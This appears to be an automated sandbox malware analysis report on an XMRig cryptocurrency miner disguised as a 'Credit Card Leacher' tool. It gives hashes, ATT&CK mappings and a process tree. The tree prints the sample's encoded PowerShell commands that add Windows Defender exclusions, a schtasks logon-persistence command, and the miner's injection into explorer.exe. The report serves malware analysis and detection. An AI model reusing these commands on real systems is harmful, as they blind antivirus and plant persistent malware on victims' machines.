xmrig | 186a73506a0107663515b4f48e07cad159cb54c03f6e08a164e5c8b2c83ad59d

Analysis

max time kernel
149s
max time network
147s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22/12/2024, 03:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Credit Card Leacher Updated.exe
Size

39.6MB
MD5

1a66e85ed92c4b32a2bd9f05c618f09a
SHA1

9cae80b15315271cce4e941f2e05cd7147963e21
SHA256

747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd
SHA512

cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95
SSDEEP

49152:N7aJSKwMWHXN8K5vWXHbQbW0Bzip3iLXL47MUvu6w0BoiO9ix2NfjIfJvndZ1QUF:

Score

10^/10

xmrig defense_evasion miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/2204-58-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-46-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-52-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-63-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-60-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-56-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-54-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-64-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-50-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-49-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-44-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-66-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-67-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-68-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-69-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-70-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/2204-71-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2216	services.exe

Loads dropped DLL 1 IoCs

pid	Process
108	cmd.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2216 set thread context of 2204	2216	services.exe	46

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2976	schtasks.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1860	powershell.exe
2732	powershell.exe
2728	powershell.exe
908	powershell.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe
2204	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeLockMemoryPrivilege	2204	explorer.exe
Token: SeLockMemoryPrivilege	2204	explorer.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 2948	2808	Credit Card Leacher Updated.exe	30
PID 2808 wrote to memory of 2948	2808	Credit Card Leacher Updated.exe	30
PID 2808 wrote to memory of 2948	2808	Credit Card Leacher Updated.exe	30
PID 2948 wrote to memory of 1860	2948	cmd.exe	32
PID 2948 wrote to memory of 1860	2948	cmd.exe	32
PID 2948 wrote to memory of 1860	2948	cmd.exe	32
PID 2948 wrote to memory of 2732	2948	cmd.exe	33
PID 2948 wrote to memory of 2732	2948	cmd.exe	33
PID 2948 wrote to memory of 2732	2948	cmd.exe	33
PID 2808 wrote to memory of 2648	2808	Credit Card Leacher Updated.exe	34
PID 2808 wrote to memory of 2648	2808	Credit Card Leacher Updated.exe	34
PID 2808 wrote to memory of 2648	2808	Credit Card Leacher Updated.exe	34
PID 2648 wrote to memory of 2976	2648	cmd.exe	36
PID 2648 wrote to memory of 2976	2648	cmd.exe	36
PID 2648 wrote to memory of 2976	2648	cmd.exe	36
PID 2808 wrote to memory of 108	2808	Credit Card Leacher Updated.exe	37
PID 2808 wrote to memory of 108	2808	Credit Card Leacher Updated.exe	37
PID 2808 wrote to memory of 108	2808	Credit Card Leacher Updated.exe	37
PID 108 wrote to memory of 2216	108	cmd.exe	39
PID 108 wrote to memory of 2216	108	cmd.exe	39
PID 108 wrote to memory of 2216	108	cmd.exe	39
PID 2216 wrote to memory of 2512	2216	services.exe	40
PID 2216 wrote to memory of 2512	2216	services.exe	40
PID 2216 wrote to memory of 2512	2216	services.exe	40
PID 2512 wrote to memory of 2728	2512	cmd.exe	42
PID 2512 wrote to memory of 2728	2512	cmd.exe	42
PID 2512 wrote to memory of 2728	2512	cmd.exe	42
PID 2512 wrote to memory of 908	2512	cmd.exe	43
PID 2512 wrote to memory of 908	2512	cmd.exe	43
PID 2512 wrote to memory of 908	2512	cmd.exe	43
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46
PID 2216 wrote to memory of 2204	2216	services.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe
"C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\system32\cmd.exe
  "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- C:\Windows\system32\cmd.exe
  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2976
- C:\Windows\system32\cmd.exe
  "cmd" cmd /c "C:\Users\Admin\Microsoft\services.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:108
- - C:\Users\Admin\Microsoft\services.exe
    C:\Users\Admin\Microsoft\services.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Windows\system32\cmd.exe
      "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe rgzpgjdhvtrpdhhm0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB/QqEHKsc9yzR1WCQJ7J8y4FJYAp32SMQk+tLqNtiHL0PjBuVZABQ5ukZR7e0SRfX4xEoiLmw1vlCGjE3tD9jkaW0Eb3g8xC853ExIyl3HXWE4KJSqUta4SlK9ap4/lUG7HSkPpOIdCfGQjSInh0JdS48s7Oabg9uN3CnrI68x9uM+MwDGCSH2OOWc3n3R2wFXXGQeHnv1fJecZzwkB29i7BNrwykLdw+WMPR8DFl3LhypSUf+F8CiC9ldILCynMFSmlYucQSU8v0a+LG2gPkyvi+vQ+Vp0gurA3OjTRVWoPffxhqXVSy8+sZ90fNdq3Ocr+86JU3WhmIz1dp84geiw=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2d7188b6a478d7d6cb46588060bc122e

SHA1
f13e08dc96dff0a4e629ba6962b5885fe5814a09

SHA256
fd8cbf9fdfbe2a89ceb052fae3b1ce85c87c9b1a7adefbf5b355f14d03c50818

SHA512
d41382a48be6fb257f19c5e4c107b5f8979320bc35760e60fcbe9e858805e7eb778af174a5161e5ceab8f32a468fa0afddff34f83e84e1f0a0f4d10e8777c6f2

Download Submit
\Users\Admin\Microsoft\services.exe

Filesize
39.6MB

MD5
1a66e85ed92c4b32a2bd9f05c618f09a

SHA1
9cae80b15315271cce4e941f2e05cd7147963e21

SHA256
747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd

SHA512
cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95

Download Submit
memory/1860-10-0x000000001B200000-0x000000001B4E2000-memory.dmp

Filesize
2.9MB

Download
memory/1860-11-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download
memory/2204-64-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-44-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-71-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-40-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-70-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-69-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-68-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-67-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-66-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-49-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-50-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-39-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-42-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-58-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-46-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-52-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-65-0x0000000000370000-0x0000000000390000-memory.dmp

Filesize
128KB

Download
memory/2204-63-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-62-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2204-60-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-56-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2204-54-0x0000000140000000-0x0000000140787000-memory.dmp

Filesize
7.5MB

Download
memory/2732-18-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download
memory/2732-17-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/2808-0-0x0000000002CC0000-0x0000000004A77000-memory.dmp

Filesize
29.7MB

Download
memory/2808-1-0x000007FEF6383000-0x000007FEF6384000-memory.dmp

Filesize
4KB

Download
memory/2808-25-0x000007FEF6380000-0x000007FEF6D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-5-0x000007FEF6380000-0x000007FEF6D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-2-0x0000000026C20000-0x00000000289D8000-memory.dmp

Filesize
29.7MB

Download
memory/2808-20-0x000007FEF6380000-0x000007FEF6D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-19-0x000007FEF6383000-0x000007FEF6384000-memory.dmp

Filesize
4KB

Download
memory/2808-3-0x000007FEF6380000-0x000007FEF6D6C000-memory.dmp

Filesize
9.9MB

Download
memory/2808-4-0x000007FEF6380000-0x000007FEF6D6C000-memory.dmp

Filesize
9.9MB

Download